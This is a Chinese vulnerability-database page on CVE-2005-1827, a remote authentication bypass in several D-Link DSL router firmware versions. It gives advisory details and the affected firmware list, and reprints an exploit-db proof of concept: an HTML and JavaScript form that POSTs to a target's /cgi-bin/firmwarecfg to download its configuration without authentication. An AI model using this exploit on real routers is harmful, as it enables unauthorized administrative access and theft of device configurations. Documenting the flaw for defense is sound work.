D-Link DSL路由器可绕过访问认证漏洞

D-Link DSL路由器可绕过访问认证漏洞

漏洞ID 1108794 漏洞类型 访问验证错误
发布时间 2005-05-19 更新时间 2005-10-20
图片[1]-D-Link DSL路由器可绕过访问认证漏洞-安全小百科CVE编号 CVE-2005-1827
图片[2]-D-Link DSL路由器可绕过访问认证漏洞-安全小百科CNNVD-ID CNNVD-200505-1215
漏洞平台 Hardware CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/25684
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-1215
|漏洞详情
D-LinkDSL路由器是家庭和小型办公室常用的路由器。D-LinkDSL路由器对用户访问的认证存在问题,远程攻击者可能利用此漏洞非授权访问设备。在执行CGI/cgi-bin/firmwarecfg时,脚本会检查在/var/tmp/中是否存在fw_ip文件。如果存在这个文件的话,就会允许其中列出的所有IP地址无需认证直接访问设备。如果不存在这个文件的话,CGI就会创建一个新文件,在其中写入请求地址。
|漏洞EXP
source: http://www.securityfocus.com/bid/13679/info

Various D-Link DSL routers are susceptible to a remote authentication bypass vulnerability. This issue is due to a failure of the devices to require authentication in certain circumstances.

This vulnerability allows remote attackers to gain complete administrative access to affected devices.

Various D-Link devices with the following firmware revisions are affected by this issue:
- V1.00B01T16.EN.20040211
- V1.00B01T16.EU.20040217
- V0.00B01T04.UK.20040220
- V1.00B01T16.EN.20040226
- V1.00B02T02.EU.20040610
- V1.00B02T02.UK.20040618
- V1.00B02T02.EU.20040729
- V1.00B02T02.DE.20040813
- V1.00B02T02.RU.20041014

Due to the common practice of code reuse, other devices are also likely affected by this issue. 

<html><head>Download config.xml:<title>GetConfig - Config file
download</title></head><body>

<script lang="javascript">
function invia_richiesta()
{
document.DownloadConfig.action='http://'+document.InputBox.Host.value+'/cgi-bin/firmwarecfg';
document.DownloadConfig.submit();
}
</script>

<form name="InputBox">
<br>http://<input Name="Host" type="text" value="">/cgi-bin/firmwarecfg<br>
</form>
<form name="DownloadConfig" method="POST" action=""
enctype="multipart/form-data">
<input type="Submit" name="config" value="Download"
onClick="javascript:invia_richiesta();"><br>
</form></body></html>
|参考资料

来源:BUGTRAQ
名称:20050526DSL-504T(andmaybemanyother)remoteaccesswithoutpasswordbug
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=111722515805478&w;=2
来源:BID
名称:13679
链接:http://www.securityfocus.com/bid/13679
来源:SECUNIA
名称:15422
链接:http://secunia.com/advisories/15422

相关推荐: Multiple Vendor Bluetooth Device Unspecified Information Disclosure Vulnerability

Multiple Vendor Bluetooth Device Unspecified Information Disclosure Vulnerability 漏洞ID 1099286 漏洞类型 Unknown 发布时间 2003-11-12 更新时间 2…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享